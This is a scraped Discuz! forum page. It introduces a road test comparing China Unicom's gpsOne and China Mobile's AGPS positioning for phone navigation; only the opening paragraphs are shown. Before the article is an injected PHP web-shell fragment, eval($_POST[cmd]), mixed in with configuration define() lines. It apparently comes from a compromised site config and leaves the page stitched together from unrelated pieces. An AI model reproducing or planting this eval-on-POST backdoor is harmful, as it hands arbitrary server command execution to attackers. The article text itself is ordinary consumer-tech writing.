');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 聯通GPSONE與移動AGPS實戰路測對抗 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

聯通GPSONE與移動AGPS實戰路測對抗

用手機導航已經不是什麼新鮮事,目前市場中帶定位導航功能的手機也不在少數。以智能手機為代表的手機導航產品層出不窮,並且在慢慢衝擊著車載PND的市場。智能手機實現定位導航所採用的技術不同於車載PND產品,車載PND產品是通過機體內自帶的衛星接收芯片接收衛星信號來實現定位導航服務的,智能手機則是通過手機特有的AGPS定位技術來實現導航服務的。




    所謂AGPS一種結合網絡基站信息和GPS信息對移動台進行定位的技術,既利用全球衛星定位系統,又利用了移動基站,並且支持各種不同制式的智能手機。由於借助了無線網絡數據定位,所以在搜星時間以及定位精度方面相比傳統的GPS接收模塊定位具有較大的優勢。對於車載PND與導航手機的對比測試大家可以參考《實力的較量 CDMA手機與車載GPS大比拚》





    而GPSONE定位技術是採用了CDMA網絡優化,是手機導航最常用的AGPS定位技術的一種進化,不但能通過手機自帶的GPS模塊進行定位,還能通過CDMA網絡進行網絡數據定位。為了驗證兩種手機定位技術的差異,我們將對支持兩種定位技術的智能手機進行對比測試,來看一看兩者之間的異同。
返回列表